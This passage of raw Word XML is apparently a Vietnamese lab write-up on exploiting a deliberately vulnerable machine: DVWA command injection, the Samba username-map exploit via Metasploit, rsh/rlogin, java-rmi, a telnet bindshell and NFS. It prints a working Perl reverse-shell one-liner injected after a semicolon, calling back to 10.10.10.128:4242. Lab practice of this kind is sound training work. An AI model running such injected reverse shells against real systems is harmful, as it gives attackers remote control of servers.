        <w:t>Trong nhiều kết quả thì mình để ý có phpinfo nên mình sẽ thử truy cập vào nó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E7A8D" w14:textId="7936CBAC" w:rsidR="001F037B" w:rsidRDefault="001F037B">
      <w:r w:rsidRPr="001F037B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463080AB" wp14:editId="15517637">
            <wp:extent cx="5731510" cy="3404235"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="65206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7458" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3404235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC03EF7" w14:textId="4CD17010" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Kết quả trả về toàn bộ phần phpinfo của php, đây là một vị trí khá nhạy cảm vì nếu nó bị lộ thì sẽ giúp kẻ tấn công có thêm thông tin về phiên bản của php cũng như các thông tin quan trọng khác và từ những thông tin này chúng có thể thực hiện các cuộc tấn công vào máy chủ web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D13854" w14:textId="3FB11328" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Tiếp đến, thì mình sẽ chỉ truy cập vào lựa chọn dvwa vì đây là một trang để luyện tập nên mình sẽ chỉ thực hiện khai thác đơn giản trên nó. Ở đây mình sẽ chọn lỗ hổng command execution vì nó là một lỗ hổng nguy hiểm giúp thực thi shell trên máy chủ web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4A72E" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5"/>
    <w:p w14:paraId="252B2BBE" w14:textId="626A373D" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD618B2" wp14:editId="5848076E">
            <wp:extent cx="5731510" cy="3357245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2249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100" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3357245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E1EA67" w14:textId="10855879" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau một thời gian thử thì mình biết được máy chủ thực hiện lệnh ping trên command với giá trị đầu vào là ip đc đưa vào. Và sau khi mình đưa thêm dấu ; và lệnh ls để kết thúc lệnh ping rồi thực thi lệnh ls thì nó đã thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B54E2" w14:textId="13AD3A69" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77A69AA5" wp14:editId="583003F4">
            <wp:extent cx="5731510" cy="2640330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="5668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9239" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2640330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="418C7CC4" w14:textId="6B7010F4" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t xml:space="preserve">Sau đó để gọi reverse shell thì mình sẽ sử dụng lệnh: </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:t>;perl -e 'use Socket;$i="10.10.10.128";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EA40E" w14:textId="478BF86D" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FC63EAB" wp14:editId="0BC5CF1B">
            <wp:extent cx="5731510" cy="3054350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11293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8787" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3054350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86B0CE" w14:textId="016E1280" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Vào máy kali và đã thành công gọi shell của máy chủ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272ADADD" w14:textId="16508C9B" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2EC36B" wp14:editId="5986290A">
            <wp:extent cx="5731510" cy="964565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="11080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9524" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="964565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF4186" w14:textId="76C872CB" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện khai thác </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netbios</w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5A374C" w14:textId="5972513C" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11A35A98" wp14:editId="7EBEC77E">
            <wp:extent cx="5731510" cy="306705"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11102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7569" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="306705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A9FB0" w14:textId="3646E253" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Sau khi tìm hiểu về phiên bản của samba trên mạng, m</w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:t>ột lỗ hổng thực thi lệnh trong Samba phiên bản 3.0.20 đến 3.0.25rc3 bị khai thác bởi mô-đun này khi sử dụng tùy chọn cấu hình “Username Map Script” không phải mặc định. Kẻ tấn công có thể triển khai các lệnh tùy ý bằng cách định nghĩa tên người dùng bao gồm các siêu ký tự shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D40ECD" w14:textId="1B456CC4" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:t>Mở metasploit để sử dụng mã khai thác đã được viết sẵn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233DAA47" w14:textId="5B57B1D9" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E4EABAC" wp14:editId="7D2B333C">
            <wp:extent cx="5731510" cy="2498725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17789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3819" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2498725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E7E3E" w14:textId="44E79815" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:t>Chỉnh rhost và rport về ip của máy lab và port của dịch vụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E5696" w14:textId="2A5DBCFB" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6927B65C" wp14:editId="32F5BE5F">
            <wp:extent cx="5731510" cy="706755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12381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2359" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="706755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF7248" w14:textId="593A8303" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:t xml:space="preserve">Run và truy cập shell thành công dưới quyền </w:t>
      </w:r>
      <w:r>
        <w:t>root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08DEE5" w14:textId="51C105E7" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750C5F28" wp14:editId="7608A7B9">
            <wp:extent cx="5731510" cy="2789555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15827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5769" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2789555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E8861" w14:textId="075FB0BB" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện khai thác </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dịch vụ r trên cổng 512 513 514 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE2592" w14:textId="0F0A224B" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Các cổng TCP 512, 513 và 514 được gọi là dịch vụ "r" và đã được cấu hình sai để cho phép truy cập từ xa từ bất kỳ máy </w:t>
      </w:r>
      <w:r>
        <w:t>chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4E1F6" w14:textId="7366F615" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r>
        <w:t>Thử dùng netcat để kết nối đến và phát hiện có 1 shell đc mở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEFEFC6" w14:textId="56520248" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="232E5634" wp14:editId="43ADDEC2">
            <wp:extent cx="3562847" cy="752580"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="20311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8175" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3562847" cy="752580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B515E56" w14:textId="174E7F5F" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r>
        <w:t>Kết nối đến bằng lệnh rsh và thành công vào shell của root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B0B47E" w14:textId="0156E51D" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DA02B19" wp14:editId="7A48BD91">
            <wp:extent cx="5731510" cy="2129155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="9750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2004" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2129155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D765B5" w14:textId="237DED5D" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r>
        <w:t>Ngoài ra có thể sử dụng rlogin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBEF58D" w14:textId="7F30FFB3" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CE77A8" wp14:editId="70484374">
            <wp:extent cx="5731510" cy="2043430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5566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6759" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2043430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BBB5E" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA0BD0F" w14:textId="260EFC36" w:rsidR="00924CA5" w:rsidRDefault="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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>java-rmi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD32038" w14:textId="18830297" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5">
      <w:r>
        <w:t>Sau một hồi nghiên cứu về java-rmi trên mạng, mình thấy có một hướng dẫn để khai thác về dịch vụ này, vì vậy mình đã thử sử dụng nó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB563B5" w14:textId="618FFE08" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C116A58" wp14:editId="6662E173">
            <wp:extent cx="5731510" cy="3389630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1570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797" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3389630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B5C921" w14:textId="2770BE29" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3BF766" wp14:editId="1413E1C8">
            <wp:extent cx="5731510" cy="487680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1731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7625" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="487680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9A295" w14:textId="4B1D128D" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:t xml:space="preserve">Run và truy cập shell thành công dưới quyền </w:t>
      </w:r>
      <w:r>
        <w:t>root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2C268" w14:textId="6D6DA2E6" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="220F41B9" wp14:editId="7A98E6DD">
            <wp:extent cx="5731510" cy="2060575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="24922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6555" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2060575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B34336" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5"/>
    <w:p w14:paraId="003A9661" w14:textId="5221D581" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bindshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21607CD4" w14:textId="0D1AB8D0" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5530A880" wp14:editId="46BD2565">
            <wp:extent cx="4296375" cy="181000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="6965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7379" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4296375" cy="181000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A8C9F" w14:textId="3C1947A4" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r>
        <w:t>Thử trelnet vào dịch vụ này thành công vào root luôn -.- :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44471542" w14:textId="7E322CEE" w:rsidR="00924CA5" w:rsidRDefault="00924CA5">
      <w:r w:rsidRPr="00924CA5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65F2B054" wp14:editId="2A6368C0">
            <wp:extent cx="4544059" cy="1066949"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86849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6503" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4544059" cy="1066949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78CF51" w14:textId="77777777" w:rsidR="00924CA5" w:rsidRDefault="00924CA5"/>
    <w:p w14:paraId="04753B27" w14:textId="0024D76C" w:rsidR="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00924CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A90F41" w14:textId="3B4548BD" w:rsidR="00924CA5" w:rsidRPr="00924CA5" w:rsidRDefault="00924CA5" w:rsidP="00924CA5">
      <w:r>
        <w:t>Sử dụng showmount để xem máy lab đang chia sẻ thư mục nào:</w:t>
      </w:r>
    </w:p>
